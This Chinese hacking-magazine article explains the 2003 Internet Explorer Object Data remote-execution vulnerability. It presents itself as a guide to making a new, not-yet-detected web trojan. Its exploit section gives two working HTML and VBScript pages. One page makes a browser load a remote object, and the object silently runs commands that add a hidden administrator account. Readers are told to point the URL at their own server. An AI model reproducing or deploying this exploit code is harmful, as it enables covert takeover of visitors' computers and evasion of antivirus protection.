利用IE Object Data漏洞制做全新网页木马(图)

原发黑客x档案第8期,版权归杂志所有.

利用Internet Explorer Object Data漏洞制做全新网页木马
lcx
今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞。这对于网页木马爱好者来说可是一件好事，我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了。在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞。
一、漏洞描述
该漏洞内由eEye Digital Security发现并于8月20号公布的，微软同一天也发布了相应的公告。在eEye的网站公布页面：http://www.eeye.com/html/Research/Advisories/AD20030820.html这个文档中提到，Microsoft Internet Explorer是一款流行的WEB浏览程序，Internet Explorer在处理对象"Object"标记时没有正确处理要被装载的文件参数。
"Object"标记用于插入ActiveX组件等对象到HTML页面。"Object"标记的"Type"属性用于设置或获取对象的MIME类型。通常合法MIME类型包括"plain/text"或"application/hta", "audio/x-mpeg"等。Internet Explorer指定远程对象数据位置的参数没有充分检查被装载的文件属性，攻击者可以构建恶意页面，诱使用户访问来运行恶意页面指定的程序 。Windows 2003 Internet Explorer由于使用了"Enhanced Security Configuration Mode"模式，默认是使用 了"Disable ActiveX"，因此此漏洞在Windows 2003 IE级别为中等。
这段描述很专业，不过看不懂的菜鸟可以跳过，直接学制做方法。：-）
二、受影响的系统版本
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
三、漏洞利用详细方法
根据http://www.eeye.com/html/Research/Advisories/AD20030820.html这个页面的提示，我写出了两个简单的测试页面。请先看代码和注释，我再来讲解一下。

--------------test.htm代码开始-----------------
<html>
<body>
这是个测试页,如果你的系统是w2k或xp,访问后将会增加一个用户名是lcx密码是lcxlcx的管理用户
<object data="http://127.0.0.1/test.test"></object>
<!--这就是来调用一个恶意页面了test.test，我是在本机测试的，放在我的iis管理器根目录下，所以url是http://127.0.0.1；如果你要用这段代码，请更改相应的网test.test的url地址，将http://127.0.0.1/test.test改成http://你的url/test.test--!>
</body>
------------test.htm代码结束--------------

--------------test.htm中写到的test.test代码开始------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user lcx lcxlcx /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators lcx /add",0)
'这是加一个用户是lcx密码是lcxlcx的管理用户，这段vbs你应当会看懂
</script>
</html>
------------test.test代码结束---------------